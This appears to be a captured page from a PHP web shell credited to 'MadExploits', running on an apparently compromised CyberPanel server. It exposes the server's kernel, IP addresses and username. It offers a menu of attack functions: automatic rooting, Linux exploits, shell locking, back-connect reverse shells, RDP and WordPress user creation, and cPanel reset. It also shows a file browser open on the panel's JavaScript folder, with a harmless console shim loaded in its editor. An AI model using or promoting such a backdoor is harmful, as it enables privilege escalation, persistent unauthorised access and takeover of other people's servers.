Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
public /
static /
filemanager /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
ace
[ DIR ]
drwxr-xr-x
angular-file-upload.min.js
22.13
KB
-rw-r--r--
codeMirror.js
6.5
KB
-rw-r--r--
console-sham.js
572
B
-rw-r--r--
es5-sham.min.js
4.31
KB
-rw-r--r--
es5-shim.min.js
13.98
KB
-rw-r--r--
fileManager.js
54.62
KB
-rw-r--r--
fileManagerModern.js
11.2
KB
-rw-r--r--
jquery-1.8.3.min.js
91.44
KB
-rw-r--r--
newFileManager.js
62.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : console-sham.js
/** * Fixed error: "console" is undefined in IE<10 if dev tools are not open */ (function(window) { if (window.console) return; window.console = (function() { var methods = 'assert,clear,count,debug,dir,dirxml,error,exception,group,groupCollapsed,groupEnd,info,log,markTimeline,profile,profileEnd,table,time,timeEnd,timeStamp,trace,warn'.split(','); var noop = function() {}; var object = {}; var key; while(key = methods.pop()) { object[key] = noop; } return object; }()); }(window));
Close